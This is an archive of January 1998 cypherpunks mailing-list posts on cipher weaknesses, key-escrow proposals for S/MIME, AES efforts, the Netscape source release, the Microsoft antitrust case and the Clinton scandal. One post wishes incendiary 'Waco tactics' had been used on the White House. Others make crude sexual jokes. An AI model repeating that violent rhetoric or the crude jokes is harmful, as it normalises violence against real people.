"National borders aren't even speed bumps on the information superhighway."







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <bill.stewart@pobox.com>
Date: Sat, 24 Jan 1998 16:26:44 +0800
To: Tim May <ryan@michonline.com
Subject: Re: Misty???
In-Reply-To: <199801231500.KAA17132@homeport.org>
Message-ID: <3.0.5.32.19980123235513.007ceba0@popd.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



At 08:02 AM 1/23/98 -0800, Tim May wrote:
>Yes, I was thinking of FEAL. And even FEAL was not "snake oil," in that the
>inventors of it were not trying to use deception to promote it. (I consider
>this to be part of what "snake oil" is.)

When FEAL was written, it wasn't snake oil.  If anybody tries to use it
today, it _is_ snake oil, because it and a number of variants on it
are well known to be broken.  (Too bad, because it was made to be 
small and light and run on wimpy processors, but there are now other
small fast cyphers around.)
				Thanks! 
					Bill
Bill Stewart, bill.stewart@pobox.com
PGP Fingerprint D454 E202 CBC8 40BF  3C85 B884 0ABE 4639





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Kent Crispin <kent@songbird.com>
Date: Sat, 24 Jan 1998 16:03:21 +0800
To: cypherpunks@cyberpass.net
Subject: Re: Sucking Sound...
In-Reply-To: <3.0.3.32.19980123083544.006a9088@popd.netcruiser>
Message-ID: <19980123235636.36170@songbird.com>
MIME-Version: 1.0
Content-Type: text/plain



On Fri, Jan 23, 1998 at 06:30:27PM -0800, Tim May wrote:
> At 8:35 AM -0800 1/23/98, Jonathan Wienke wrote:
> 
> >Has anyone else heard a "giant sucking sound" from the vicinity of the
> >White House lately?
> 
> If that was an intentional pun, a good one.
> 
> But I had been marveling at how the Clinton troubles were being ignored by
> the Cypherpunks...I figured we were all so jaded about government and the
> criminals who flourish in Washington that there was no point in commenting
> on this latest revelation of corruption. (The apparent perjury, suborning
> perjury, and witness-tampering, not the affair with Lewinsky, however
> tawdry it was.)
> 
> It would have been interesting to see the whole process leading up to
> Clinton's resignation (next week?) pass without any discussion by us.
> 
> (Actually, I threw in an aside yesterday about "President Gore," but no one
> picked up on it.)
> 
> Personally, I think having a crippled and ineffective President is better
> than having an activist bozo President Gore, so I'm kind of hoping this
> whole affairs takes several more months to unwind.

Tim has missed the most important part of this whole episode: the fact
that Linda Tripp was wearing a wire, and apparently working for the
FBI.  Think for a moment about the position this puts what's his name 
in -- you know, the guy who's name begins with an "F", who works for 
Janet Reno...

In fact I am amazed that cp's in general haven't picked up on the
potential significance of this.  Think back to just a few short weeks
ago, when Freeh and Reno had their little spat...

What do you think about congressional resistance to wiretaps, in 
light of current events?

-- 
Kent Crispin				"No reason to get excited",
kent@songbird.com			the thief he kindly spoke...
PGP fingerprint:   B1 8B 72 ED 55 21 5E 44  61 F4 58 0F 72 10 65 55
http://songbird.com/kent/pgp_key.html





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Miller <dm0@avana.net>
Date: Sat, 24 Jan 1998 12:59:53 +0800
To: cypherpunks@Algebra.COM
Subject: Jay Leno on Clinton 1/23/98
Message-ID: <34C974E1.70B42BD8@avana.net>
MIME-Version: 1.0
Content-Type: text/plain



Tonight in Leno's monologue they did a piece on the eriee
similarities between Nixon and Clinton:

  NIXON:  Was known for the campaign slogan "Nixon's the One!"
CLINTON:  Known by the phrase "That's the Guy!"

  NIXON:  Was known for his "widows peak"
CLINTON:  Known to make widows peak

  NIXON:  Took on Ho Chi Minh
CLINTON:  Took on Ho

  NIXON:  Was familiar with G. Gordon Liddy
CLINTON:  Familiar with the G-spot

  NIXON:  Wanted "Peace with Honor"
CLINTON:  Wanted "Piece while on her"


--David Miller

middle  rival
devil rim lad





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Back <aba@dcs.ex.ac.uk>
Date: Sat, 24 Jan 1998 08:51:34 +0800
To: cypherpunks@cyberpass.net
Subject: IETF S/MIME to follow PGP in building in GAK?
Message-ID: <199801240031.AAA00863@server.eternity.org>
MIME-Version: 1.0
Content-Type: text/plain




You may recall the furor generated by PGP Inc adding a GAK enabling
feature thus making it easier for governments to impose GAK on the
deployed PGP 5.x user base.  PGP Inc called this feature CMR
(Corporate Message Recovery) or ARR (Additional Recipient Request).

Over on IETF S/MIME, right now there is a thread which looks set to
add an almost identifical feature to S/MIME (spooky how similar the
feature is even).  Most of the regular contributors on S/MIME work for
GAK sell out companies anyway, so I figure this is pretty much a done
deal.

(S/MIME already has another form of GAK also, in that the X.509 key
directory specs allow the directory to optionally keep _private_ keys
also).

I think the ARR mechanism is actually more dangerous than keeping
locally escrowed copies of keys in PGP because of the web of trust
model.  (See: http://www.dcs.ex.ac.uk/~aba/cdr/ for my thoughts on
this).

In the S/MIME world where there is a more hierarchical approach to
Certification, you can expect government run CAs which demand a copy
of your private key also.  (eg. the UK DTI document on crypto
licensing proposals was talking about this method).  For S/MIME,
S/MIME style ARR seems fairly balanced in lethality to CAs which keep
private keys.

I wonder if Phil Zimmermann feels proud of himself now that S/MIME
looks like it will adopt his CAK/GAKware design.

You might be amused at this introductory remark from the proposer on
S/MIME IETF:

: As a side note, this is not a radically new concept as something very
: similar has already been proposed and implemented by PGP.
:  
: Flames welcome.
 
The guy's proposal below.  It was well received too.  Someone else
proposed adding it in as a core MUST S/MIME requirement to handle
these additional recipient requests.

(You can follow the thread on the hypertext archive at www.imc.org
(look for IETF S/MIME mailing list, or by subscribing to
ietf-smime@imc.org).

Adam

======================================================================
Date: Fri, 23 Jan 1998 13:07:01 -0700
From: "Steve Russell" <steve.russell@worldtalk.com>
Subject: Corporate Key mechanism
To: <ietf-smime@imc.org>

A new and somewhat radical thread....
 
 

Because I believe the following to be true:
 
- Requiring key recovery is a bad thing (complexity, cost,
  implementation, etc.)

- Companies do have a need to access mail encrypted to or encrypted by
  their employees (lost keys, legal investigations, etc)

- We are all working on methods of satisfying US export requirements
  so that we can export a cryptographically useful product

- The is a middle step between full key recovery and no hope of
  recovery which involves encrypting messages to a 'corporate key' in
  addition to a individual public key when sending a message.
 
Basically, what is involved is changing the user certificate format to
designate a field for a second certificate which represents the
corporate public key appropriate for that user.  An application
intending to encrypt mail to that user MUST then encrypt the message
to both the user key and the corporate key.
 
By no means am I implying that everyone that implements S/MIME leave a
back door into all of their messages.  However, since most companies
that are implementing secure messaging are setting up their own CA
(Entrust, OnSite, Netscape, etc.) and they have control over what
fields are populated and with what information, they are able to
choose whether or not they need visibility into their own data.
 
As a side note, this is not a radically new concept as something very
similar has already been proposed and implemented by PGP.
 
Flames welcome.
 
Steve





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <bill.stewart@pobox.com>
Date: Sat, 24 Jan 1998 16:38:10 +0800
To: Tim May <cypherpunks@cyberpass.net
Subject: Re: Sucking Sound...
In-Reply-To: <3.0.3.32.19980123083544.006a9088@popd.netcruiser>
Message-ID: <3.0.5.32.19980124003505.008a8c70@popd.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



At 06:30 PM 1/23/98 -0800, Tim May wrote:
>But I had been marveling at how the Clinton troubles were being ignored by
>the Cypherpunks...I figured we were all so jaded about government and the
>criminals who flourish in Washington that there was no point in commenting
>on this latest revelation of corruption. (The apparent perjury, suborning
>perjury, and witness-tampering, not the affair with Lewinsky, however
>tawdry it was.)

I was talking to Hugh yesterday, and he asked if I'd heard the big news
- no, not Clinton's sex scandal, the important news, about the
Netscape browser source code being freed :-)
(This was before the news on the Unabomber confession broke.)

>(Actually, I threw in an aside yesterday about "President Gore," but no one
>picked up on it.)

If the Democrats think Clinton's going down anyway, they're probably
better off having him resign now and give Gore a couple years in office,
since he'll probably be re-elected if the economy stays strong (probable)
and if the Republicans don't come up with a useful candidate (probable);
if he has to be Vice-Clinton for two more years, he's got minimal chance
of election even if the Republicans come out with another bozo,
because Gore will be more tainted and still just waterboy.

>Personally, I think having a crippled and ineffective President is better
>than having an activist bozo President Gore, so I'm kind of hoping this
>whole affairs takes several more months to unwind.

Yeah - especially since President Gore would have to start off by
Doing Something to get some positive momentum, and it would probably
be doing something bad to the Internet.
				Thanks! 
					Bill
Bill Stewart, bill.stewart@pobox.com
PGP Fingerprint D454 E202 CBC8 40BF  3C85 B884 0ABE 4639





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Back <aba@dcs.ex.ac.uk>
Date: Sat, 24 Jan 1998 09:22:51 +0800
To: cypherpunks@cyberpass.net
Subject: cryptix java AES effort
Message-ID: <199801240059.AAA00241@server.eternity.org>
MIME-Version: 1.0
Content-Type: text/plain




(AES is the Advanced Encryption Standard, a NIST standardisation
process ongoing at present to select a replacement encryption
algorithm for DES.  Algorithm submissions were requested by NIST from
any interested parties.)

AES requires submitters to include reference java implementations.

Systemics provides a BSD licensed (free for commercial and
non-commercial use) java crypto library called cryptix.  Cryptix has
an IJCE interface which means that it integrates with other java
crypto apps as a standard java cryptographic service class.

  http://www.systemics.com

Systemics are interested to add AES candidate algorithms to cryptix,
and are offering to provide the java implementation to any AES
algorithm submitters, see:

  http://www.cs.ucl.ac.uk/staff/I.Brown/cryptix/aes/AES_crypt.html

Systemics also are interested in encouraging programmers to join in
this effort:

  http://www.cs.ucl.ac.uk/staff/I.Brown/cryptix/aes/AES_prog.html

Adam
-- 
Now officially an EAR violation...
Have *you* exported RSA today? --> http://www.dcs.ex.ac.uk/~aba/rsa/

print pack"C*",split/\D+/,`echo "16iII*o\U@{$/=$z;[(pop,pop,unpack"H*",<>
)]}\EsMsKsN0[lN*1lK[d2%Sa2/d0<X+d*lMLa^*lN%0]dsXx++lMlN/dsM0<J]dsJxp"|dc`





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Back <aba@dcs.ex.ac.uk>
Date: Sat, 24 Jan 1998 09:23:12 +0800
To: cypherpunks@cyberpass.net
Subject: URL for S/MIME CAK discussions
Message-ID: <199801240113.BAA00416@server.eternity.org>
MIME-Version: 1.0
Content-Type: text/plain




I wrote:

> (You can follow the thread on the hypertext archive at www.imc.org
> (look for IETF S/MIME mailing list, or by subscribing to
> ietf-smime@imc.org).

The discussions on S/MIME CAK/GAK implementations start with:

	http://www.imc.org/ietf-smime/mail-archive/1038.html

Adam





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jonathan Wienke <JonWienk@ix.netcom.com>
Date: Sat, 24 Jan 1998 17:54:49 +0800
To: Tim May <cypherpunks@cyberpass.net
Subject: Re: Sucking Sound...
In-Reply-To: <3.0.3.32.19980123083544.006a9088@popd.netcruiser>
Message-ID: <3.0.3.32.19980124012706.006c5264@popd.netcruiser>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

At 06:30 PM 1/23/98 -0800, Tim May wrote:
>At 8:35 AM -0800 1/23/98, Jonathan Wienke wrote:
>
>>Has anyone else heard a "giant sucking sound" from the vicinity of the
>>White House lately?
>
>If that was an intentional pun, a good one.

It just goes to show Ross Perot was half right ;)  It wasn't coming from
Mexico because of NAFTA; it was coming (heheh he said coming, Beavis!) from
Clinton's bimbos in action!  Maybe he could sell the videotapes, and apply
the proceeds to reducing the deficit...X-rated stuff is a growth industry
lately.

>But I had been marveling at how the Clinton troubles were being ignored by
>the Cypherpunks...I figured we were all so jaded about government and the
>criminals who flourish in Washington that there was no point in commenting
>on this latest revelation of corruption. (The apparent perjury, suborning
>perjury, and witness-tampering, not the affair with Lewinsky, however
>tawdry it was.)

Oddly similar to Watergate--the break-in was not a big deal, but the cover
up was.

>Personally, I think having a crippled and ineffective President is better
>than having an activist bozo President Gore, so I'm kind of hoping this
>whole affairs takes several more months to unwind.

I'd like to see the Asian money connection established sufficiently well
that Boinker and the Tree-man get hauled off in handcuffs together. 
Hmmm...Boinker And The Tree-Man...sounds like one of those sucky late-'60s
folk rock groups...or else a really bad Saturday morning catroon...ummm
cartoon.  It's late and my rationality module keeps throwing this really
odd GPF...
-----BEGIN PGP SIGNATURE-----
Version: PGP for Business Security 5.5

iQA/AwUBNMmz6MJF0kXqpw3MEQLdsQCfaZhvrJSacH2MrT7lyAhCFhtfilIAn3ub
2xUzK8M6v/cOk8w+FTy4D9ke
=HEAN
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan <alan@clueserver.org>
Date: Sat, 24 Jan 1998 16:34:49 +0800
To: Bill Stewart <bill.stewart@pobox.com>
Subject: Re: Misty???
In-Reply-To: <3.0.5.32.19980123235513.007ceba0@popd.ix.netcom.com>
Message-ID: <Pine.LNX.3.95.980124013419.482A-100000@www.ctrl-alt-del.com>
MIME-Version: 1.0
Content-Type: text/plain



On Fri, 23 Jan 1998, Bill Stewart wrote:

> At 08:02 AM 1/23/98 -0800, Tim May wrote:
> >Yes, I was thinking of FEAL. And even FEAL was not "snake oil," in that the
> >inventors of it were not trying to use deception to promote it. (I consider
> >this to be part of what "snake oil" is.)
> 
> When FEAL was written, it wasn't snake oil.  If anybody tries to use it
> today, it _is_ snake oil, because it and a number of variants on it
> are well known to be broken.  

Then maybe we should refer to FEAL as "Lemon Oil"? ]:>

alan@ctrl-alt-del.com | Note to AOL users: for a quick shortcut to reply
Alan Olsen            | to my mail, just hit the ctrl, alt and del keys.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ryan Anderson <ryan@michonline.com>
Date: Sat, 24 Jan 1998 16:08:51 +0800
To: Tim May <tcmay@got.net>
Subject: Re: Sucking Sound...
In-Reply-To: <v03102800b0ef0154981a@[207.167.93.63]>
Message-ID: <Pine.GSO.3.95.980124025616.3738A-100000@king>
MIME-Version: 1.0
Content-Type: text/plain




> (Actually, I threw in an aside yesterday about "President Gore," but no one
> picked up on it.)

I'd wager we all saw  it, and couldn't think of anythign clever to say.  

Funny thing about all this:  In a recent Newsweek a former Congressman who
just got out of jail was talking about how he was disgusted byt the
current Congress.  *ALL* they do is posture, they don't even bother going
through the motions of passing legislation.   The Congress of the 80s at
least *did* something.  (Okay, so it wasn't very useful, or good, but a
Congress that does nothign can't be changed with any effect, one that
actually gets things done once in a while, if persuaded to change a
little, might be a benefit...)

If anyone cares, I might still have that one, I can look up who it was...

> 
> Personally, I think having a crippled and ineffective President is better
> than having an activist bozo President Gore, so I'm kind of hoping this
> whole affairs takes several more months to unwind.
> 
> --Tim May
> 
> 
> 
> The Feds have shown their hand: they want a ban on domestic cryptography
> ---------:---------:---------:---------:---------:---------:---------:----
> Timothy C. May              | Crypto Anarchy: encryption, digital money,
> ComSec 3DES:   408-728-0152 | anonymous networks, digital pseudonyms, zero
> W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
> Higher Power: 2^2,976,221   | black markets, collapse of governments.
> "National borders aren't even speed bumps on the information superhighway."
> 
> 
> 


Ryan Anderson - Alpha Geek
PGP fp: 7E 8E C6 54 96 AC D9 57  E4 F8 AE 9C 10 7E 78 C9
print pack"C*",split/\D+/,`echo "16iII*o\U@{$/=$z;[(pop,pop,unpack"H*",<>
)]}\EsMsKsN0[lN*1lK[d2%Sa2/d0<X+d*lMLa^*lN%0]dsXx++lMlN/dsM0<J]dsJxp"|dc`





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Sat, 24 Jan 1998 12:25:27 +0800
To: cypherpunks@toad.com
Subject: Re: Why no "Banner Ad Eaters"?
Message-ID: <199801240418.FAA17881@basement.replay.com>
MIME-Version: 1.0
Content-Type: text/plain



Tim May wrote:

>Yeah, I'm surprised that "banner ad eaters" have not been widely deployed.
>(If they're available, I haven't about them.) Something to remove the
>annoying banners, or stop them from wasting valuable time loading in the
>first place.

Tim, I'm surprised. WebFree for the Macintosh does this very thing. It
matches on URL substrings and simply removes these things wholesale from
your browser window. No broken image boxes, nothing. It also kills cookies
and stops animated GIFs from leaking through, if you want to nuke either of
those things.

The URL is: http://www.falken.net/webfree/

Junkbusters (http://www.junkbusters.com/) offers a personal proxy server
kind of thing that lets you mash just about everything: HTTP headers, user
agent info, referer URL, cookies, etc. It runs on either NT or Unix variants.
One could also use it to get around a firewall configured to reject 
non-standard browsers, but That Would Be Wrong, as Nixon once said. It lets
you specify which sites or substrings to look for, and which ones you trust.
It also does proxy chaining.

Ratbert
ratbert at nym dot alias dot net






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Attila T. Hun" <attila@hun.org>
Date: Sat, 24 Jan 1998 14:41:34 +0800
To: rantproc <cypherpunks@cyberpass.net>
Subject: 2 sides to the poll on DOJ v. M$
In-Reply-To: <3.0.3.32.19980123145928.01266c90@earthlink.net>
Message-ID: <19980124.060014.attila@hun.org>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

    let's look at the tail of the Reuters newsclip on M$
    settling the immediate contempt action --a settlement
    most of the outside experts say gives the government
    an advantage in the final determination.  

    what I dont like is that M$ scored a huge PR victory
    by caving in to the government --it had no choice, 
    but many of the fence sitters are now going to state
    that M$ is "reforming" --which is pure bullshit; they
    are playing the Lenin-Stalin game of dealmaking so they
    can regroup and work around it, then blatantly violate
    it after they have sufficient strength.  I like the
    comment Maureen quoted the 21st from one attorney who
    liked M$ to smallpox --"...stamp it out, ...or it will
    come back."

But a poll issued Friday cast doubt on how far the public
backs the government's scrutiny of Microsoft.

A Time/CNN survey of 1,020 adults Jan.  14-15 found 46
percent thought Microsoft's dominant role in the software
industry was good for consumers against 30 percent who
thought it was bad.

    I am surprised they determined only 46% thought it was
    good as it has made for cheap, almost good enough, and
    ubiquitous software --if you dont mind settling for
    mediocrity with most innovations products M$ has either
    preempted or stolen.

    what is really surprising is that there really were 30%
    who acknowledged the danger of M$ as a monopoly! 

    people vote for government with their wallets --voting
    for "cheaper" commerce-- even more so. Americans are 
    not known for their discriminating choice of products
    based on quality and function --they almost always 
    settle for "almost good enough" and cheap. secondly, 
    they are truly "sheeple" and must have what everybody
    else has which is a market driven by positive feedback 
    --in analog amplifiers, that often causes smokeouts--
    and controlled are commonly referred to as oscillators.

The same poll found 51 percent thought the government should
refrain from steps to reduce Microsoft's advantage over
other software companies vs. 32 percent who thought the
government should intervene.

    this one is also very telling. the 51% is peanuts 
    against the fact that 30% actually believe the government
    should intervene! --that is even more impressive 
    considering that most Americans want government to do
    less and trust federal agencies even less.

    for something as complicated as antitrust actions, I 
    find the 32% proactive intervention percentage rather
    warm and fuzzy in that there is a real understanding 
    that M$ is a malignant cancer, and needs to be treated 
    as such.

    M$ made a serious mistake treating the judge, the DOJ,
    and the American people with the contempt they have 
    always treated their competitors. gone are the home 
    grown 'aw shucks' appreciation of the American success
    story --Gate$ and crew have been shown to be the selfish
    4 year old brats we in the industry have all learned to
    "love"....

    the only danger of this recent poll is that M$ spin 
    doctors will show it as a victory --it's not. 30+%
    that want to curtail your power is not a victory --the
    percentage changed from a few hundred or a thousand of
    in the industry who feel Gate$ has long since passed 
    the acceptable level of control to greater than 30% of
    the population-- _that_ is significant.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3i
Charset: latin1
Comment: No safety this side of the grave. Never was; never will be

iQBVAwUBNMmLfbR8UA6T6u61AQH4HQH/TIjc9GJhrJdcPvXtQ1A9CNVRk9zQdCRH
YHR5X0OGgEWN+U5cLnMRvEGbhoLiKDRHTklsE7vKmsGSBZc7MwAd0A==
=uPBW
-----END PGP SIGNATURE-----






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Vipul Ved Prakash <mail@vipul.net>
Date: Sat, 24 Jan 1998 09:50:16 +0800
To: adam@homeport.org
Subject: Re: Netscape 5 will be GPL'ed
In-Reply-To: <199801231938.OAA19072@homeport.org>
Message-ID: <199801240659.GAA03702@fountainhead.net>
MIME-Version: 1.0
Content-Type: text



Adam Shostack wrote:

> 	I'm not sure that this is the message they're sending at all.
> They're trying to work the Linux/GNU model of getting a horde of
> volunteer programmers to improve their product, and base other
> products on it, because of the ease of integration.  I don't know that
> security was even on their minds.

It doesn't matter. In fact this is the smartest thing they 
could have done.  Given their recent financial predicament 
and the level of competence and cluefulness they have shown 
in the past, I am amazed they didn't let inertia and their 
investment in the anti-civilization (and pointy haired 
managers) hold them back. 

I feel that Microsoft's extremely determined attempts to corner 
the browser market has forced them to stop evading reality 
for a while. They seem to have realized that the best model 
for their business is Caldera/Redhat/Stronghold model. To add
value to already existing free software that adheres to an open 
standard. Releasing Netscape 5 code will effectively ensure 
them a standard to capitalize on. 

Best, 
Vipul 

Links: 

x. http://www.openspace.org/ has setup up a forum for developing 
   free Netscape. 

x. http://slashdot.org/slashdot.cgi?mode=article&artnum=425 
   http://www.slashdot.org/slashdot.cgi?mode=article&artnum=499 
   this guy first suggested that netscape should go GPL (on january 12) 
   and predicted they'll do it right away. 

-- 
Powell lingered. "How's Earth?" 
It was a conventional enough question and Muller gave the 
conventional answer, "Still spinning."
				      -- "Reason", Asimov. 
==================================================================
Vipul Ved Prakash                 | - Electronic Security & Crypto 
mail@vipul.net                    | - Web Objects 
91 11 2233328                     | - PERL Development 
198 Madhuban IP Extension         | - Linux & Open Systems 
Delhi, INDIA 110 092              | - Networked Virtual Spaces





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Sat, 24 Jan 1998 20:51:31 +0800
To: cypherpunks@cyberpass.net
Subject: Announcement: RPK InvisiMail released on 12 Jan, 1998
Message-ID: <v04003900b0ef8ed0cff7@[139.167.130.248]>
MIME-Version: 1.0
Content-Type: text/plain




--- begin forwarded text


From: RPK New Zealand Ltd <info@rpkusa.com>
Date: Fri, 23 Jan 1998 15:24:28
Subject: Announcement: RPK InvisiMail released on 12 Jan, 1998

You have received this message because at some time during the past two
years you have requested to be put on the RPK New Zealand Ltd. company
mailing list.  (We're the Fast Public Key Encryption company).  If you wish
to be removed from the list, please forward this message to
remove@rpkusa.com

--------------------------------

RPK New Zealand Ltd. in a joint venture with Virtually Online Ltd. has
released RPK InvisiMail, a standards-based e-mail security application for
use with Internet mail software (SMTP/POP3).  The product offers the
strongest encryption available anywhere in the world.  Since it was built
outside the United States, it is also available all over the world with
strong encryption.  RPK InvisiMail is also the easiest product of its type
to setup and use which makes it quite unique.

You can learn more about this product by reading the press release below or
by visiting the web site at www.InvisiMail.com.  We are also offering FREE
downloads of the RPK InvisiMail Intro product.  Please give it a try and
pass it along to anyone you like.

--------------------------------

For Immediate Release

Contact:	Sal Cataldi, Cataldi PR +1 212.941.9464, scataldi@earthlink.net,
www.InvisiMail.com

RPK InvisiMail(tm), secure Internet e-mail with globally available strong
encryption for Microsoft, Netscape platforms

SAN FRANCISCO, Jan. 12, 1998 - InvisiMail Ltd (www.InvisiMail.com)
announced today immediate worldwide availability of RPK(tm) InvisiMail(tm),
a standards-based e-mail security add-in for Microsoft, Netscape and other
POP3/SMTP Internet e-mail clients and gateway servers.  Tested and
certified by the International Computer Security Association
(www.ncsa.com), RPK InvisiMail automatically and transparently encrypts
e-mail messages and attachments, authenticates the sender and verifies the
contents of each message have not been changed in transit.

RPK InvisiMail is globally available with high strength encryption.
InvisiMail and the underlying RPK encryption algorithm were developed
outside the United States.  Therefore, InvisiMail is not subject to
restrictive U.S. export policies.  RPK InvisiMail is as easy to set up and
use as anti-virus software, and just as important.

While Microsoft and Netscape battle each other with incompatible and
difficult to use security offerings, InvisiMail seamlessly integrates with
ALL popular POP3/SMTP e-mail products including Netscape, Microsoft,
Eudora, Pegasus, Calypso -- more than any other solution available today --
making it the preferred e-mail security product for multi-platform use,
worldwide.

All InvisiMail users can send the FREE InvisiMail Intro version to anyone
worldwide, providing compatibility without requiring others to purchase
anything, making InvisiMail unique among
e-mail security offerings.

"Most people don't realize that their e-mail can be forged, altered or read
by anyone, any time, without any evidence," said Jack Oswald, President and
CEO of RPK Ltd.  "Without products like RPK InvisiMail, communications on
the Internet are untrustworthy."

InvisiMail uses the RPK Fast Public Key Encryptonite(tm) Engine, the
strongest cryptography available worldwide today.  RPK is dramatically
faster than the well-known RSA algorithm, yet just as secure.  RPK has been
analyzed by world class cryptographers who have issued reports on the
security and integrity of the technology.

"InvisiMail is the easiest, fastest, most transparent e-mail security
product I have seen," said Kevin Shannon, President of net*Gain, a
specialist in launching Internet companies. "This is the product we've all
been waiting for."

As part of its official launch, InvisiMail Professional is available FREE
to all New Zealand residents for ninety days.

RPK InvisiMail is available in two desktop versions: Intro (FREE) and
Professional (introductory price $29.95).  RPK InvisiMail Enterprise
Gateway Server will be available Q2 1998.  InvisiMail can be downloaded
from: www.InvisiMail.com.

All trademarks and registered trademarks are those of their respective
companies.

***

--- end forwarded text



-----------------
Robert Hettinga (rah@shipwright.com), Philodox
e$, 44 Farquhar Street, Boston, MA 02131 USA
"... however it may deserve respect for its usefulness and antiquity,
[predicting the end of the world] has not been found agreeable to
experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'
The e$ Home Page: http://www.shipwright.com/
Ask me about FC98 in Anguilla!: <http://www.fc98.ai/>






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tim May <tcmay@got.net>
Date: Sun, 25 Jan 1998 00:38:18 +0800
To: cypherpunks@cyberpass.net
Subject: Executing Kaczynski
In-Reply-To: <v03102800b0ef0154981a@[207.167.93.63]>
Message-ID: <v03102800b0efc2f9809e@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain



At 1:13 AM -0800 1/24/98, Anonymous wrote:

>The more important silence is about the instant sentencing of the
>Unabomber compared to Jim Bell's sentencing.  What _is_ happening with
>Jim?

Because it was so utterly obvious that Kaczynski _was_ the Unabomber,
through diaries, physical evidence, his plea bargaining discussions, and
confessions in his other writings, the outcome was a foregone conclusion.
(I thought all the foofaw about whether Kaczynski was the Unabomber or not
was fatuous nonsense...in my world, when you find bomb materials in a home,
with no evidence they were planted there by the FBI or BATF, and you find
diaries and papers and bomb plans, and travel documents match the dates in
question, and on and on, then it is impossible with a straight face to talk
about the issue of guilt still be up in the air....I guess this is why I'll
never be a juror.)

I generally favor having very, very few things made criminal, but having
very, very fast and efficient trials. E.g., a court date set for several
weeks after an arrest, a week-long trial, and execution (if decided upon) a
few weeks later. So, Kaczynski, O.J., the Menendez brothers, and their ilk
would have gotten fast trials and quick trips to the wall.

(For those who think this is inconsistent with anarchist or crypto
anarchist views, reread the sections of "The Diamond Age" where the mugger
was dispatched off the end of the pier. Polycentric law doesn't mean
charade trials which last for a year, with appeals and delays lasting
another 10 years.)

BTW, Kaczynski is apparently no crazier that any number of Cypherpunks I
have met, including myself. Recall that a leading Cypherpunk was suspected
for a while as being the Unabomber.


>I saw that.  There are rumors floating about that they have the goods
>on Gore too, his hands are certainly as dirty as Slick Willie's.  I'd

Yeah I've read reports that the FBI has surveillance tapes of him taking
bribes ("campaign contributions") from Asian and other donors. With him
implicating the Administration directly. It could well be that this is what
has kept both Louis Freeh and Janet Reno in office: they have the goods on
Clinton and Gore.

I'll say this about Janet Reno: she certainly acted swifty. (Which probably
shows the 20 hours of taped conversations and other evidence is
overwhelming, for Reno to so quickly authorize the attempt to sting the
President.)

Though it was too bad she didn't use Waco tactics and send the tanks in to
send incendiary materials through windows of the White House.

--Tim May




The Feds have shown their hand: they want a ban on domestic cryptography
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
ComSec 3DES:   408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^2,976,221   | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tim May <tcmay@got.net>
Date: Sun, 25 Jan 1998 00:46:30 +0800
To: cypherpunks@www.video-collage.com
Subject: Re: Document destruction services
In-Reply-To: <199801241536.JAA04018@manifold.algebra.com>
Message-ID: <v03102801b0efc924f38f@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain



At 7:36 AM -0800 1/24/98, Igor Chudov @ home wrote:
>Hi,
>
>
>I have a box of confidential papers that I do not need. I would prefer not
>to just throw them away, but to either shred or incinerate them. Due to
>the sheer size of the box, it is not practical for me to buy and use a home
>shredder. Would anyone have a suggestion as to what is the best way to
>destroy them? Aer there any services that do it inexpensively?

Just burn them, either in a fireplace, since it's winter, or in a 55-gallon
drum.

Or in a campfire.

Should go quickly.

I don't understand what the issue is.

--Tim May

The Feds have shown their hand: they want a ban on domestic cryptography
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
ComSec 3DES:   408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^2,976,221   | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ichudov@Algebra.COM (Igor Chudov @ home)
Date: Sat, 24 Jan 1998 23:40:21 +0800
To: cypherpunks@www.video-collage.com
Subject: Document destruction services
Message-ID: <199801241536.JAA04018@manifold.algebra.com>
MIME-Version: 1.0
Content-Type: text



Hi,


I have a box of confidential papers that I do not need. I would prefer not
to just throw them away, but to either shred or incinerate them. Due to
the sheer size of the box, it is not practical for me to buy and use a home
shredder. Would anyone have a suggestion as to what is the best way to
destroy them? Aer there any services that do it inexpensively?

Thank you

igor





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@ssz.com>
Date: Sat, 24 Jan 1998 23:46:53 +0800
To: cypherpunks@ssz.com (Cypherpunks Distributed Remailer)
